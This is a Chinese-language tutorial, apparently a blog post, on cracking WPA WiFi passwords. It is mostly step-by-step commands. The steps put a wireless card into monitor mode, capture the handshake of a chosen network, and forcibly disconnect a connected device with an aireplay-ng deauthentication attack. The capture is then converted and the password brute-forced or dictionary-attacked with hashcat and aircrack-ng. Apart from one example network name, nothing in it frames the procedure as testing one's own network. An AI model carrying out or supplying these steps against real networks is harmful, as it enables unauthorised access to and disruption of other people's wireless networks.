要破解 WIFI 密码,首先要抓到 WIFI 的握手包,要想得到 WIFI 的握手包,就需要在监听时刚好有设备连接了该 WIFI,但这就需要运气加成,因此可以我们可以主动将该 WIFI 的设备踢下去,一般设备就会自动连接该 WIFI,此时我们就抓到握手包了。
air*-ng 工具套件介绍:
https://www.cnblogs.com/coisini-zheng/p/15841050.html
命令 说明
aircrack-ng 破解WEP以及WPA(字典攻击)密钥
airdecap-ng 通过已知密钥来解密WEP或WPA嗅探数据
airmon-ng 将网卡设定为监听模式
aireplay-ng 数据包注入工具(Linux和Windows使用CommView驱动程序)
airodump-ng 数据包嗅探:将无线网络数据输送到PCAP或IVS文件并显示网络信息
airtun-ng 创建虚拟管道
airolib-ng 保存、管理ESSID密码列表
packetforge-ng 创建数据包注入用的加密包。
Tools 混合、转换工具
airbase-ng 软件模拟AP
airdecloak-ng 消除pcap文件中的WEP加密
airdriver-ng 无线设备驱动管理工具
airolib-ng 保存、管理ESSID密码列表,计算对应的密钥
airserv-ng 允许不同的进程访问无线网卡
buddy-ngeasside-ng 的文件描述
easside-ng 和AP接入点通讯(无WEP)
tkiptun-ng WPA/TKIP攻击
wesside-ng 自动破解WEP密钥
https://cloud.tencent.com/developer/article/1756342?from=15425
抓取 WIFI 握手包
1、将网卡处于监听状态
airmon-ng check
airmon-ng check kill // 关闭影响监听状态的进程
airmon-ng start wlan0
wlan0 是网卡名称,一般都是 wlan0,如果不是则需要根据自己的情况进行修改,可通过 iwconfig 进行查看网卡的名称
当使用 iwconfig 查看网卡名称变为 wlan0mon 说明此时网卡已经处于监听模式了
2、扫描可用 WIFI
airodump-ng wlan0mon
3、获取wifi的握手包
1)扫描设备信息
airodump-ng -c (上一步扫描的 CH ) --bssid (想要破解 WIFI 的 bssid ) -w (握手文件存放目录) wlan0mon
这里以 ssid 为 teamssix 的 WIFI 为例
airodump-ng -c 1 --bssid 5E:C1:1B:A2:37:F1 -w ./ wlan0mon
2)为了顺利得到 WIFI 的握手包,可以将该 WIFI 下的设备强制踢下去
aireplay-ng -0 0 -a (要破解的 wifi 的 bssid ) -c (强制踢下的设备的 MAC 地址) wlan0mon
可以看到 teamssix 这个 WIFI 有一个设备正在连接,该设备的 MAC 地址为:38:26:2C:13:D3:33,使用以下命令可以将其强制踢下去
aireplay-ng -0 0 -a 5E:C1:1B:A2:37:F1 -c 38:26:2C:13:D3:33 wlan0mon
等待设备重新连接后,当右上角出现 WPA handshake 的时候说明获取成功
参数说明:
https://blog.csdn.net/qq_28773223/article/details/128104513
-0 表示端口连接
0 表示断开的次数(0为无数次)
-a 表示要破解的WIFI路由器 (BSSID列)
-c 表示要踢下线的设备(手机终端) (STATION列)
抓包还可以用 CDLinux 下,水滴工具。
- 握手包转码
hashcat 使用的是 hccapx 后缀的文件,而上面的获取到的 是cap后缀文件,所以要转码。
1)方式一:在线转码, 使用 hashcat 官网提供的在线工具进行格式转换:
https://hashcat.net/cap2hashcat/
会在同目录下生成 1.hccapx 文件
2)方式二:本地工具转码,hashcat-utils-1.9
介绍页:https://hashcat.net/wiki/doku.php?id=hashcat_utils
下载地址:https://github.com/hashcat/hashcat-utils/releases
cap2hccapx 1.cap 1.hccapx
会在同目录下生成 1.hccapx 文件
cap 名字建议使用 MAC地址命名,防止乱
5、破解密码
1)方式一:使用自带的库生成
hashcat -a 3 -m 2500 1.hccapx ?d?d?d?d?d?d?d?d --force
或者
hashcat -a 3 -m 22000 1.hc22000 ?d?d?d?d?d?d?d?d --force
2)方式二:字典破解
https://blog.csdn.net/qq_28773223/article/details/128104513
aircrack-ng -w passwd.txt -b 5E:C1:1B:A2:37:F1 ./test.cap
-w 密码字典
-b 设备的MAC(BSSID)
./test.cap cap文件